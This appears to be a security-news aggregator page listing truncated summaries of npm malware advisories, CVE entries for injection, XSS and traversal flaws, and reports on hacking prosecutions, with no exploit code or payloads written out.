MAL-2025-48552 Malicious code in tailwindcss-awesomefont (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 85ee9e62f66e09344e931a1854ac52622771856fda95ece5f148374cc50b406b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

CVE-2020-26507

A CSV Injection also known as Formula Injection vulnerability in the Marmind web application with version 4.1.141.0 allows malicious users to gain remote control of other computers. By providing formula code in the “Notes” functionality in the main screen, an attacker can inject a payload into th...

MAL-2024-11119 Malicious code in exwx (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b49adfe29064d8cd3b5231b88df336858fb6897be7f624b8402782e303c58c31 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

CVE-2024-37825

CVE-2024-37825 concerns EnvisionWare Computer Access & Reservation Control SelfCheck v1.0. The Red Hat, NVD, CVE lists and related advisories confirm an unauthenticated directory traversal vulnerability that can be triggered by attackers on the same network. The issue is tied to SelfCheck v1.0 an...

JetBrains TeamCity 安全漏洞

JetBrains TeamCity is a set of distributed build management and continuous integration tools from the Czech company JetBrains. The tool provides continuous unit testing, code quality analysis and build problem analysis reports and other features. JetBrains TeamCity suffers from a privilege issue...

Sensitive Information Exposure in Sylius

Impact Any other user can view the data if the browser tab remains open after logging out. Once someone logs out and leaves the browser open, the potential attacker may use the back button to see the content exposed on given screens. No action may be performed though, and any website refresh will...

Cross-site Scripting (XSS) - Stored in livehelperchat/fbmessenger

Description The application does not escape special characters. The $item-bbcode or $item-name variables can lead to stored XSS Proof of Concept Go to Facebook BBCode List https://demo.livehelperchat.com/siteadmin/fbmessenger/newbbcode and add an item with XSS payload into name or bbcode fields,...

Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat

Description The Mobile Options settings does not sanitise and escape the $mboptions'fcmkey' parameter lead to stored XSS Proof of Concept Go to Mobile settings, fill XSS payload into FCM Key field kind of: somekey" Impact XSS can have huge implications for a web application and its users. User...

Elasticsearch Kibana CSV Injection Vulnerability

Elasticsearch Kibana is a suite of open source, browser-based analytics and search Elasticsearch dashboard tools from Elasticsearch Netherlands. A CSV injection vulnerability exists in Elasticsearch Kibana. An attacker can exploit the vulnerability to run malicious commands on a logged-in user's...

CVE-2019-3424

authentication issues vulnerability, which exists in V2.1.14 and below versions of C520V21 smart camera devices. An attacker can automatically obtain access to web services from the authorized browser of the same computer and perform operations...

LuminosityLink Hacking Tool Author Gets 30-Months Prison Sentence

A 21-year-old Kentucky man who previously pleaded guilty to developing, marketing, and selling an infamous remote access trojan RAT called LuminosityLink has now been sentenced to 30 months in prison. According to a press release published Monday by U.S. Attorney's Office, Colton Grubbs, who used...

CVE-2017-9961

A vulnerability exists in Schneider Electric's Pro-Face GP Pro EX version 4.07.000 that allows an attacker to execute arbitrary code. Malicious code installation requires an access to the computer. By placing a specific DLL/OCX file, an attacker is able to force the process to load arbitrary DLL...

Code injection

A vulnerability exists in Schneider Electric's Pro-Face GP Pro EX version 4.07.000 that allows an attacker to execute arbitrary code. Malicious code installation requires an access to the computer. By placing a specific DLL/OCX file, an attacker is able to force the process to load arbitrary DLL...

CVE-2017-9961

A vulnerability exists in Schneider Electric's Pro-Face GP Pro EX version 4.07.000 that allows an attacker to execute arbitrary code. Malicious code installation requires an access to the computer. By placing a specific DLL/OCX file, an attacker is able to force the process to load arbitrary DLL...

Medical Study Blasts Hospitals' Security Practices

A scathing rebuke of medical professionals’ attitudes toward information security reveals nurses and doctors fumble over protocols often putting patients at risk. The revealing study, “Workarounds to Computer Access in Healthcare Organizations PDF,” offers a fascinating look behind the privacy...

Axis Network Cameras Cross-Site Scripting Vulnerability

Axis Network Video transmits and captures live images directly over IP networks, enabling users to view and manage the camera system using a Web browser. A cross-site scripting vulnerability exists in Axis Network Cameras. An attacker is able to execute arbitrary code on the victim's browser and...

College Student Gets Year in Prison for Wire Fraud in Tampering With Student Election

A former Cal State San Marcos student was sentenced to a year in prison this week for wire fraud and other charges related to election tampering by using keystroke loggers to grab student credentials and then vote for himself. Matthew Weaver, 22, of Huntington Beach, Calif., stole almost 750...

New Jersey mayor arrested for hacking recall website

New Jersey mayor arrested for hacking recall website The FBI last week arrested the mayor of the northern New Jersey town of West New York, together with his son, on charges of hacking into a website and a related email account that called for the mayor's recall. Felix Roque, 55, the mayor of Wes...

Pro-Syrian Malware Targets, Impedes Activists

The Electronic Frontier Foundation EFF warned this week that political activists in Iran and Syria are being targeted in malware attacks disgised as Adobe Flash Player updates on Youtube. In a blog post by the EFF’s Eva Galperin and Morgan Marquis-Boire on Thursday said the attacks occur after...

Snail mail the drive

Not comfortable sticking your precious mobile device in the mail? Remove the hard drive from the device and snail mail that to your destination. If you’re flying, pack it in your checked bag. If necessary, you can travel with a second, blank hard drive in case you need access to the computer whil...